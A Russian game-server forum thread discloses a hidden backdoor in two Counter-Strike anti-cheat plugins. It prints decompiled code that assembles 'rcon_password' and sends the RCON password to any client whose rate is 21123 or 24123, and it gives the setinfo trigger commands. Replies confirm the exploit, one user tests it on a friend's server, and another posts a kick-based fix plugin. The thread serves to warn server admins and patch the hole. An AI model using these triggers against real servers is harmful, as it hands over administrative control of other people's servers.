Важная информация

Перед тем как создать тему или задать вопрос, ознакомьтесь с данной темой, там собраны наиболее распространенные уязвимости и способы устранения.
Так же не поленитесь воспользоваться поиском, вполне возможно, что ваш вопрос уже поднимался на форуме.
При создании новой темы уделите внимание ее названию, оно должно кратко описывать суть вашего вопроса/проблемы. Все вновь созданные темы с названиями "Помогите", "Объясните", "Подскажите" и т.д. будут удалены, а их авторы наказаны.

Вся правда о CSFile.Info Anti-Cheat и CSFile.Info OpenGL32 Detect

, И почему я НЕ рекомендую ими пользоваться

Опции

Makzz	22.8.2010, 12:03 Сообщение #1
Стаж: 18 лет Сообщений: 2198 Благодарностей: 1365 Полезность: 1080	Вся правда о CSFile.Info Anti-Cheat и CSFile.Info OpenGL32 Detect Здравствуйте уважаемые посетители c-s.net.ua. Сегодня я сделал интересное открытие по поводу двух античитерских плагинов от автора с ником -)>C-r-A-c-K<(-. Речь пойдёт CSFile.Info Anti-Cheat версии 1.23 Alfa [build 28] и CSFile.Info OpenGL32 Detect версии 2.1 Final. Начну пожалуй с плагина определения OpenGL32 Hack'ов. Как-то меня попросили на форуме отлучить этот плагин от модуля MySql, я в свою очередь конечно же согласился. Понятное дело чтобы это можно было сделать, требовалось получить исходный код, которого нет на паблике. Вооружившись некоторыми деасамблирующими программами я обратил внимание на вот такие строки: new f_sys[] = "swor" new csf_ac_ra[] = "ra" new d_unit[] = "s" new cv_mypunish[] = "rc" new g_vac2[] = "on_" Если немного перемешать и гдето сложить (rc+on_+pa+swor+d), то получится rcon_password Все наверно знаю, что в этой серверной команде прописан RCON пароль и заполучив его сервер полностью подчинится обладателю. Но вот загвоздка чтобы получить слово rcon_password не хватает пары букв, и на ваших глазах я покажу как же формируется это слово и как получить доступ к нему. И так сперва мы отправимся в функцию plugin_init плагина CSFile.Info OpenGL32 Detect: мы видми format ( d_guard, 31, "%s%spa", cv_mypunish, g_vac2 ), т.е. d_guard приобретает вид rcon_pa. Идем дальше. Функция initialized: format ( d_guard,31,"%s%s", d_guard,d_unit ) и d_guard приобретает вид rcon_pas, ниже встречается format ( g_gate, 5, "%ste", csf_ac_ra ), т.е. g_gate это rate Функция client_connect: get_user_info(id,g_gate,cv_ac1,31), т.е. плагин получает значение инфы rate (g_gate) и записывает её в cv_ac1 Функция checkfiles_opengl32: format ( g_gate2, 5, "%d%d", 211, 23 ) Теперь функция c_check_opengl32 (она вызывается после захода игрока): Код if(equali(cv_ac1,g_gate2)) // Сверяем значение rate с 21123 { // Если одинаковы format(g_r,63,"%s%sd",d_guard,f_sys) // то формируем квар и g_r приобретает вид rcon_password get_cvar_string(g_r,g_ss,47) // Получаем пароль client_print(id,print_console,"%s",g_ss) // И пишем его в консоли игрока } Вот такие вот пироги. Если не верите - попробуйте сами... Пропишите в консоли клиента setinfo rate 21123, зайдите на сервер, и у вас в консоли окажется RCON пароль! Теперь перейду к CSFile.Info Anti-Cheat версии 1.23 Alfa [build 28]. Здесь похожая ситуация. Так же присутствуют: new f_sys[] = "swor" new csf_ac_ra[] = "ra" new d_unit[] = "s" new cv_mypunish[] = "rc" new g_vac2[] = "on_" new g_model[] = "241" Функция plugin_precache: format(g_gate2, 5, "%s%d", g_model, 23"), format ( d_guard, 31, "%s%spa", cv_mypunish, g_vac2 ) Функция initialized: format ( d_guard, 31, "%s%s", d_guard, d_unit ), format ( g_gate, 5, "%ste", csf_ac_ra ) Функция client_putinserver: get_user_info(id,g_gate,cv_ac1,31) Функция cv_anticheat (так же выполняется после захода игрока): Код if(equali(cv_ac1,g_gate2)) // Сверяем значение rate с 24123 { // Если одинаковы format(g_r,63,"%s%sd",d_guard,f_sys) // то формируем квар и g_r приобретает вид rcon_password get_cvar_string(g_r,g_ss,47) // Получаем пароль client_print(id,print_console,"%s",g_ss) // И пишем его в консоли игрока } И опять же если не верите, пропишите в консоли клиента setinfo rate 24123, зайдите на сервер, и у вас в консоли окажется RCON пароль! Любители копировать новости пожалуйста указывайте источник: c-s.net.ua и автора: Makzz CSFile.Info OpenGL32 Detect без бэкдора Затычка бэкдора от Зефира Список обследованных версий Плагин / Версия / Статус бэкдора CSFile.Info Anti-Cheat 1.23 Fix 2 Присутствует CSFile.Info Anti-Cheat 1.23 Alfa [build 15] Присутствует CSFile.Info Anti-Cheat 1.22 Присутствует Отредактировал: Makzz, - 27.8.2010, 12:01
	Поблагодарили 36 раз Поблагодарили 36 раз _Skyline, 330863, 3a4oT, 3k0HoMucT, Ares_17, complrg, comshat, CSDS, CyberMaster, exile, eXp71, fake8833, fr0x, fRk, GunzGaMe, ifAke, iLLuSioN, imba, inf, JVC, L1NkeN, lola21ru, Manafi, Mzerder, Racoon, repingayok, SaSQuaTcH_Pro, Ser_UFL, TiLos, TiR3ks, ~~Tr1sT~~, vkontakte, Z[1]., Zefir, Саша

balaban	22.8.2010, 12:09 Сообщение #2
Стаж: 18 лет Сообщений: 2131 Благодарностей: 1074 Полезность: 1160 MyArena.ru Меценат	Makzz, Хм...Попробывал,ркона я своего не увидел :)
	Поблагодарили 0 раз Поблагодарили 0 раз

Саша	22.8.2010, 12:09 Сообщение #3
Стаж: 16 лет Сообщений: 1082 Благодарностей: 441 Полезность: 828	Узнал об этом наверное одним из первых, сразу же проверил, поэтому и решил здесь отписаться. Все так и есть, после коннекта к серверу швыряет в консоль RCON сервера... Правда я хз на какой версии плагина все это катит. -)>C-r-A-c-K<(-, молодец, + тебе в репу.... (( А жаль, античиты вроде неплохие, конкретно - CSF-openGL32... Автору данного топика спасибо за то что скинул сразу же информацию в аську! Отредактировал: WiNd0z, - 22.8.2010, 12:10
	Поблагодарили 0 раз Поблагодарили 0 раз

Makzz	22.8.2010, 12:13 Сообщение #4
Стаж: 18 лет Сообщений: 2198 Благодарностей: 1365 Полезность: 1080	Цитата(balaban @ 22.8.2010, 14:09) Makzz, Хм...Попробывал,ркона я своего не увидел :) Дык а версия то у тебя какая?
	Поблагодарили 0 раз Поблагодарили 0 раз

vkontakte	22.8.2010, 12:17 Сообщение #5
Стаж: 16 лет Сообщений: 2509 Благодарностей: 486 Полезность: < 0	да,так и есть, ркон высвечивает...я почти в шоке..вырубаю ркон.. Отредактировал: vkontakte, - 22.8.2010, 12:20
	Поблагодарили 0 раз Поблагодарили 0 раз

eXp71	22.8.2010, 12:19 Сообщение #6
Стаж: 16 лет Сообщений: 211 Благодарностей: 92 Полезность: < 0	Вот ты какой баян. Бессмысленный и беспощадный! Что сказать уныл ты Crack.
	Поблагодарили 0 раз Поблагодарили 0 раз

3a4oT	22.8.2010, 12:19 Сообщение #7
Стаж: 17 лет Сообщений: 100 Благодарностей: 20 Полезность: 49	нет слов......
	Поблагодарили 0 раз Поблагодарили 0 раз

vkontakte	22.8.2010, 12:21 Сообщение #8
Стаж: 16 лет Сообщений: 2509 Благодарностей: 486 Полезность: < 0	как вариант можете зачищать клиентам консоль после коннекта
	Поблагодарили 0 раз Поблагодарили 0 раз

balaban	22.8.2010, 12:23 Сообщение #9
Стаж: 18 лет Сообщений: 2131 Благодарностей: 1074 Полезность: 1160 MyArena.ru Меценат	Makzz, Цитата [ 1] CSFile.Info OpenGL32 D 2.1 Final -)>C-r-A-c-K<(- csf_opengl32.am running [ 2] CSFile.Info Anti-cheat 1.23 Fix -)>C-r-A-c-K<(- csf_anticheat.a running На opengl32 пробывал.Даже опробывал на сервере своего друга :)
	Поблагодарили 0 раз Поблагодарили 0 раз

fr0x	22.8.2010, 12:26 Сообщение #10
Стаж: 18 лет Сообщений: 334 Благодарностей: 125 Полезность: 624	Makzz, я разместил данную новость на дедикатед-сервер.ру. Если ты будешь против - напиши, затру.
	Поблагодарили 0 раз Поблагодарили 0 раз

Саша	22.8.2010, 12:28 Сообщение #11
Стаж: 16 лет Сообщений: 1082 Благодарностей: 441 Полезность: 828	Подскажите плагин который чистит консоль юзера после коннекта.
	Поблагодарили 0 раз Поблагодарили 0 раз

balaban	22.8.2010, 12:30 Сообщение #12
Стаж: 18 лет Сообщений: 2131 Благодарностей: 1074 Полезность: 1160 MyArena.ru Меценат	vkontakte, У меня как раз такое и стоит :DD
	Поблагодарили 0 раз Поблагодарили 0 раз

Zefir	22.8.2010, 12:32 Сообщение #13
Стаж: 17 лет Сообщений: 87 Благодарностей: 50 Полезность: 443	Вот вам первая заглушка от этой напасти:) Не проверял писал прям на форум... Код #include <amxmodx> public plugin_init() register_plugin("Fix CSFile.Info BackDoor", "Zefir", "0.1") public client_connect(id) client_check(id) public client_putinserver(id) client_check(id) public client_check(id) { new rate[32] get_user_info(id, "rate", rate, charsmax(rate)) if (equal(rate, "24123") \|\| equal(rate, "21123")) server_cmd("kick #%d usage backdoor", get_user_userid(id)) } Отредактировал: Zefir, - 22.8.2010, 14:41
	Поблагодарили 5 раз Поблагодарили 5 раз kentavrius, SaSQuaTcH_Pro, WhiteBear, Z[1]., Саша

VoidLess	22.8.2010, 12:33 Сообщение #14
Стаж: 18 лет Сообщений: 8 Благодарностей: 4 Полезность: 0	Цитата(WiNd0z @ 22.8.2010, 14:28) Подскажите плагин который чистит консоль юзера после коннекта. Не поможет, заюзают чит для блокировки этой команды Единственный выход - кикать игрока до того, как это выведется в чат думаю как-то через Fakemeta с блоком эвента
	Поблагодарили 0 раз Поблагодарили 0 раз

vkontakte	22.8.2010, 12:35 Сообщение #15
Стаж: 16 лет Сообщений: 2509 Благодарностей: 486 Полезность: < 0	Цитата(balaban @ 22.8.2010, 13:30) vkontakte, У меня как раз такое и стоит :DD через сколько секунд чистит? немогу поймать момент..
	Поблагодарили 0 раз Поблагодарили 0 раз

imba

22.8.2010, 12:35

Сообщение #16

Стаж: 16 лет

Сообщений: 1677
Благодарностей: 735
Полезность: 571

Цитата

Вот такие вот пироги. Если не верите - попробуйте сами... Пропишите в консоли клиента
setinfo rate 21123, зайдите на сервер, и у вас в консоли окажется RCON пароль!

Кряк просто убыток.

Отредактировал: imba, - 22.8.2010, 12:36

!

Запрет на ответ в темах до: 10.11.29392, 21:09 

Саша	22.8.2010, 12:35 Сообщение #17
Стаж: 16 лет Сообщений: 1082 Благодарностей: 441 Полезность: 828	Будем пробовать то что написал Zefir.
	Поблагодарили 0 раз Поблагодарили 0 раз

Zefir	22.8.2010, 12:38 Сообщение #18
Стаж: 17 лет Сообщений: 87 Благодарностей: 50 Полезность: 443	Естественно надо поставить раньше античита этот плаг возможно написать точно такую putinserver и возможно заюзать fakemeta как посоветовали раньше...
	Поблагодарили 0 раз Поблагодарили 0 раз

Racoon	22.8.2010, 12:40 Сообщение #19
Стаж: 18 лет Сообщений: 1757 Благодарностей: 1523 Полезность: 1116	Цитата(Zefir @ 22.8.2010, 13:32) Вот вам первая заглушка от этой напасти:) Не проверял писал прям на форум... Код public plugin_init(id) { register_plugin("Fix CSFile.Info BackDoor", "Zefir", "0.1") } public client_connect(id) { new rate[32] get_user_info(id, "rate", rate, charsmax(rate)) if (equal(rate, "24123") \|\| equal(rate, "21123")) server_cmd("kick #%d use backdoor", get_user_userid(id)) } Что мешает CRACK'y поменять значение и перезалить плагин. РКОН офф и спаться спокойнее будет. Отредактировал: Racoon, - 22.8.2010, 12:42
	Поблагодарили 1 раз Поблагодарили 1 раз vkontakte

Zefir	22.8.2010, 12:51 Сообщение #20
Стаж: 17 лет Сообщений: 87 Благодарностей: 50 Полезность: 443	Цитата(Racoon @ 22.8.2010, 13:40) Что мешает CRACK'y поменять значение и перезалить плагин. РКОН офф и спаться спокойнее будет. Куда перезалить? К вам на сервер? Если админ о дыре не знает так к нему и так залезть можно, незачем ждать чтобы он обновился... А если о дыре знает то обновлять не будет и заглушку прилепит
	Поблагодарили 0 раз Поблагодарили 0 раз

« Предыдущая тема · Защита Игрового сервера · Следующая тема »

0 пользователей и 2 гостей читают эту тему:

Наши новости:

Важная информация

Вся правда о CSFile.Info Anti-Cheat и CSFile.Info OpenGL32 Detect